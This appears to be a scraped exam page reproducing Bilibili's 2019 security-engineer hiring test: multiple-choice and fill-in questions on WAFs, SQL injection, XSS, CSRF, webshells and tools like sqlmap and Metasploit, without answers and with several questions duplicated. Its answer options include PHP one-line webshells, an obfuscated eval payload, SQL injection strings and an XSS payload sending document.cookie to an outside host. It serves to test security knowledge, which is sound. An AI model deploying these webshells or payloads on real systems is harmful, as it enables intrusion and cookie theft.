哔哩哔哩2019秋招技术岗（安全工程师）笔试题-公司真题-面试哥

题型	单选题	判断题	简答题
数量	20	20	2

1.

以下哪些攻击是通常情况下 WAF 不能拦截的？（）

问题详情

以下哪些攻击是通常情况下 WAF 不能拦截的？（）

A. XSS
B. Redis 弱口令导致的GetShell
C. SQLI
D. 恶意CC攻击

2.

PHP 提供以下哪个函数来避免SQL注入（）

问题详情

A. mysql_real_escape_string
B. escapeshellarg
C. htmlentities
D. escapeshellcmd

3.

以下哪段代码不符合 WebShell 特征，应该作为白样本?（）

问题详情

以下哪段代码不符合 WebShell 特征，应该作为白样本?（）

A. echo copy("http://www.target.me/bili.txt","sec.php")
B. eval(gzuncompress("xڕR?n?0\x0c=/@???.??M{???l@??Kr?T?,ː?nm?/e%?%??BR||??(6?P&?n??I?k?\x00?+߈?T?T???MX????2??P???\x0aV?4V??X???z,?\x0a?a2C?x?%?gMs?]\x24??ʾ?Z\x24i:??zv??R??ʴsB?i??xxZ<????{??tK\x09hᥩ?3??ƿvbNt?x?q????枓?j??CDnU???<?O??Ż??\x0a?^x?c?'>V|\x0c??G4W?D9'|2-????+z???4?a??8?Wĩ7????????\x22?t7\x0c?,?h?}?hc1????_UJp??????n?E?e?>??uWF???E|??????0?9\x09??nZ1\x09v???Sna??
?Ӱ\x22D?=_?#|ܔ?⺄]?????N"))
C. eval('id')
D. <?php assert(${_GET}[cmd])?>

4.

以下哪个服务器历史上不存在文件解析漏洞？（）

问题详情

A. Apache
B. IIS
C. Nginx
D. Lighttpd

5.

www.b.xxx/img?src=http://remote...

问题详情

www.b.xxx/img?src=http://remote.me/1.jpg 看到上面这个URL，你觉得它可能存在哪些漏洞？

A. SSRF
B. XSS
C. 命令执行
D. 都有可能存在

6.

以下哪条命令不能获得域名解析的IP地址？（）

问题详情

A. dig
B. ifconfig
C. ping
D. nslookup

7.

Burpsuite 爆破Web登录认证需要以下哪一个模块？（）

问题详情

A. Proxy
B. Spider
C. Intruder
D. Repeater

8.

以下哪一个请求不是 SQL 注入攻击产生的？（）

问题详情

以下哪一个请求不是 SQL 注入攻击产生的？（）

A. search.php?type=1) AND 6439=4567 AND (1424=1424
B. search.php?type=1)WAITFOR DELAY '0:0:5'--
C. search.php?type=1 UNION ALL SELECT NULL,NULL,NULL,NULL-- zrqh
D. search.php?type='<sqlmap>'

9.

以下哪个工具不可以抓取HTTP数据包？（）

问题详情

A. Burpsuite
B. Wireshark
C. Fiddler
D. Nmap

10.

以下对 HIDS 说法错误的是？（）

问题详情

以下对 HIDS 说法错误的是？（）

A. HIDS 全称为History Intrusion Detection System
B. HIDS 可以检测到攻击者进行反弹shell
C. HIDS 可以检测异常的进程树或程度调用
D. HIDS 可以获取主机上面执行的所有命令

11.

哪一个 XSS payload 不是止于概念验证（POC），而...

问题详情

哪一个 XSS payload 不是止于概念验证（POC），而是进行了漏洞利用？（）

A. ?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500)
B. ?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>'}})
C. x=document.writeln(%22%3Ciframe%3E%3C/iframe%3E%22)let%20f=document.querySelector(%27iframe%27)f.contentWindow.prompt(location)
D. ?x=window.open('http://xxx.me:8080/cookie.asp?msg='+document.cookie)

12.

正则表达式语法中 \d 匹配的是？（）

问题详情

正则表达式语法中 \d 匹配的是？（）

A. 数字
B. 非数字
C. 字母
D. 空白字符

13.

以下对 XSS 中文解释正确的是？（）

问题详情

以下对 XSS 中文解释正确的是？（）

A. 跨站脚本攻击
B. 跨站请求伪造
C. 服务端请求伪造
D. 服务拒绝攻击

14.

以下不是应急响应中常用查看信息的命令是？（）

问题详情

A. ps -aux
B. echo $HOME
C. w
D. more .bash_history

15.

以下哪个是可以执行的CSRF漏洞的修复方案?（）

问题详情

A. 检测HTTP referer 字段同域
B. 过滤单引号或尖括号
C. 在每个请求里面都添加验证码校验
D. cookie关键字段设置HttpOnly属性

16.

在浏览器同源策略中和 http://www.bilibili.c...

问题详情

在浏览器同源策略中和 http://www.bilibili.com/v/dance 同源的url是？（）

A. http://www.bilibili.com:81/dir/etc.html
B. http://www.bilibili.com/dir/inner/another.html
C. https://www.bilibili.com/secure.html
D. http://news.bilibili.com/dir/other.html

17.

以下哪一段代码是php常见的 "一句话木马"？（）

问题详情

A. <%execute(request("value"))%>
B. <?php @eval($_POST[value])?>
C. <%@ Page Language="Jscript"%>
D. <%eval(Request.Item["value"])%>

18.

Redis的常用的默认端口是？（）

问题详情

Redis的常用的默认端口是？（）

A. 6379
B. 637
C. 16379
D. 23

19.

如果 https://security.bilibili.com...

问题详情

如果 https://security.bilibili.com/ 存在 git 源码泄露你应该访问哪一个url进行验证？（）

A. https://security.bilibili.com/isnice/
B. https://security.bilibili.com/.gitignore
C. https://security.bilibili.com/.git/config
D. https://www.bilibili.com/bangumi/play/ss23858

20.

通常一个网站存在CSRF漏洞，在没有其它漏洞辅助的情况下，可以通过CSRF...

问题详情

通常一个网站存在CSRF漏洞，在没有其它漏洞辅助的情况下，可以通过CSRF漏洞做下面哪件事情？（）

A. 获取网站用户注册的个人资料信息
B. 获得其它用户的Cookie值
C. 冒用网站用户的身份发布信息
D. 都可以

21.

有一个一句话木马的代码为<?php $x=$_GET['cmd']...

问题详情

有一个一句话木马的代码为<?php $x=$_GET['cmd'] @eval("$x")?>, 那他的密码是()

22.

执行命令可以清理自己在服务器上操作的指令历史记录。[$##$]

问题详情

执行命令可以清理自己在服务器上操作的指令历史记录。()

23.

aslr是对抗[$##$]攻击的技术

问题详情

aslr是对抗()攻击的技术

24.

当访问web网站某个资源不存在时，返回的HTTP状态码是[$##$]

问题详情

当访问web网站某个资源不存在时，返回的HTTP状态码是()

25.

nmap 的参数设置 -sV 代表着[$##$]

问题详情

nmap 的参数设置 -sV 代表着()

26.

sqlmap 的 --dump-all 参数代表着[$##$]

问题详情

sqlmap 的 --dump-all 参数代表着()

27.

sqlmap --tamper 参数的作用是[$##$]

问题详情

sqlmap --tamper 参数的作用是()

28.

mongodb 的默认端口号是[$##$]

问题详情

mongodb 的默认端口号是()

29.

msfconsole 要搜索永恒之蓝的漏洞的命令是[$##$]

问题详情

msfconsole 要搜索永恒之蓝的漏洞的命令是()

30.

Flask 的修饰器 @login_requried ...

问题详情

Flask 的修饰器 @login_requried 的作用是()

31.

有一个一句话木马的代码为<?php $x=$_GET['cmd']...

问题详情

有一个一句话木马的代码为<?php $x=$_GET['cmd'] @eval("$x")?>, 那他的密码是()

32.

执行命令可以清理自己在服务器上操作的指令历史记录。[$##$]

问题详情

执行命令可以清理自己在服务器上操作的指令历史记录。()

33.

aslr是对抗[$##$]攻击的技术

问题详情

aslr是对抗()攻击的技术

34.

当访问web网站某个资源不存在时，返回的HTTP状态码是[$##$]

问题详情

当访问web网站某个资源不存在时，返回的HTTP状态码是()

35.

nmap 的参数设置 -sV 代表着[$##$]

问题详情

nmap 的参数设置 -sV 代表着()

36.

sqlmap 的 --dump-all 参数代表着[$##$]

问题详情

sqlmap 的 --dump-all 参数代表着()

37.

sqlmap --tamper 参数的作用是[$##$]

问题详情

sqlmap --tamper 参数的作用是()

38.

mongodb 的默认端口号是[$##$]

问题详情

mongodb 的默认端口号是()

39.

msfconsole 要搜索永恒之蓝的漏洞的命令是[$##$]

问题详情

msfconsole 要搜索永恒之蓝的漏洞的命令是()

40.

Flask 的修饰器 @login_requried ...

问题详情

Flask 的修饰器 @login_requried 的作用是()

41.

phpinfo() 函数会打印哪一些信息？并描述这些信息可以用在渗透测试中...

问题详情

phpinfo() 函数会打印哪一些信息？并描述这些信息可以用在渗透测试中的那些环节。

42.

phpinfo() 函数会打印哪一些信息？并描述这些信息可以用在渗透测试中...

问题详情

phpinfo() 函数会打印哪一些信息？并描述这些信息可以用在渗透测试中的那些环节。

哔哩哔哩2019秋招技术岗（安全工程师）笔试题

题型介绍

以下哪些攻击是通常情况下 WAF 不能拦截的？（）

PHP 提供以下哪个函数来避免SQL注入（）

以下哪段代码不符合 WebShell 特征，应该作为白样本?（）

以下哪个服务器历史上不存在文件解析漏洞？（）

www.b.xxx/img?src=http://remote...

以下哪条命令不能获得域名解析的IP地址？（）

Burpsuite 爆破Web登录认证需要以下哪一个模块？（）

以下哪一个请求不是 SQL 注入攻击产生的？（）

以下哪个工具不可以抓取HTTP数据包？（）

以下对 HIDS 说法错误的是？（）

哪一个 XSS payload 不是止于概念验证（POC），而...

正则表达式语法中 \d 匹配的是？（）

以下对 XSS 中文解释正确的是？（）

以下不是应急响应中常用查看信息的命令是？（）

以下哪个是可以执行的CSRF漏洞的修复方案?（）

在浏览器同源策略中和 http://www.bilibili.c...

以下哪一段代码是php常见的 "一句话木马"？（）

Redis的常用的默认端口是？（）

如果 https://security.bilibili.com...

通常一个网站存在CSRF漏洞，在没有其它漏洞辅助的情况下，可以通过CSRF...

有一个一句话木马的代码为<?php $x=$_GET['cmd']...

执行 命令可以清理自己在服务器上操作的指令历史记录。[$##$]

aslr是对抗[$##$]攻击的技术

当访问web网站某个资源不存在时，返回的HTTP状态码是[$##$]

nmap 的参数设置 -sV 代表着[$##$]

sqlmap 的 --dump-all 参数代表着[$##$]

sqlmap --tamper 参数的作用是[$##$]

mongodb 的默认端口号是[$##$]

msfconsole 要搜索永恒之蓝的漏洞的命令是[$##$]

Flask 的修饰器 @login_requried ...

有一个一句话木马的代码为<?php $x=$_GET['cmd']...

执行 命令可以清理自己在服务器上操作的指令历史记录。[$##$]

aslr是对抗[$##$]攻击的技术

当访问web网站某个资源不存在时，返回的HTTP状态码是[$##$]

nmap 的参数设置 -sV 代表着[$##$]

sqlmap 的 --dump-all 参数代表着[$##$]

sqlmap --tamper 参数的作用是[$##$]

mongodb 的默认端口号是[$##$]

msfconsole 要搜索永恒之蓝的漏洞的命令是[$##$]

Flask 的修饰器 @login_requried ...

phpinfo() 函数会打印哪一些信息？并描述这些信息可以用在渗透测试中...

phpinfo() 函数会打印哪一些信息？并描述这些信息可以用在渗透测试中...

执行命令可以清理自己在服务器上操作的指令历史记录。[$##$]

执行命令可以清理自己在服务器上操作的指令历史记录。[$##$]